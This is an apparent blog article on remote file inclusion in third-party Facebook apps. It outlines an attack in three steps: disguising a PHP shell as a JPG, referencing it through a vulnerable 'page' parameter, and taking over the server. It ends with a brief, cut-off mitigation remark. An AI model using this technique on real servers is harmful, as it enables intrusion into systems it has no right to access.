Facebook Hacking: Remote File Inclusion Attack By Anzul Aqueel Soherwardi

Facebook Hacking: Remote File Inclusion Attack By Anzul Aqueel Soherwardi

Facebook being the world's largest social networking website has became the major target for the hackers, attackers and other malicious users. Facebook has hired the team world's leading security experts in order for them to improve their website's security. Moreover facebook also pays 500$ to any one who can identify any sort of vulnerability inside facebook.
The facebook security team has done a very great job in improving and taking facebook's security to the maximum level. However, the problem is that Facebook applications are not coded or monitored by facebook, and it's also not possible that facebook to monitor every single app for vulnerabilities. These facebook apps are mostly coded by common programmers who are not well aware of how a code is written securely. Which leaves facebook apps poured with common vulnerabilities like XSS ( CROSS SITE SCRIPTING), Clickjacking, Remote file inclusion etc.

Out of all of these web application vulnerabilities, Remote file inclusion is a very common web application attack which occurs because the application is not able to validate included files. According to imperva, 21% of the apps on facebook are vulnerable to remote file inclusion attack.

Here is how the attack is carried out:

Step 1 - The attacker creates a malicious jpg file, because the upload of PHP is mostly banned on webservers with user level privileges. Therefore the hacker renames a PHP shell to some thing like shell.php.jpg in order to upload it to the webserver.

Step 2 - Next the hacker exploits RFI vulnerability in order to reference malicious JPG, which paramtere is something like.

.php?page=url of your malicious image

Step 3 - Next the attacker takes control of the server by just going to the url of the JPG image.

Mitigation:

Imperva suggests a four step mitigation process which can be found inside the image below, However it includes the deployment of web application firewall, but what if some one is not using a WAF, However will he be protected.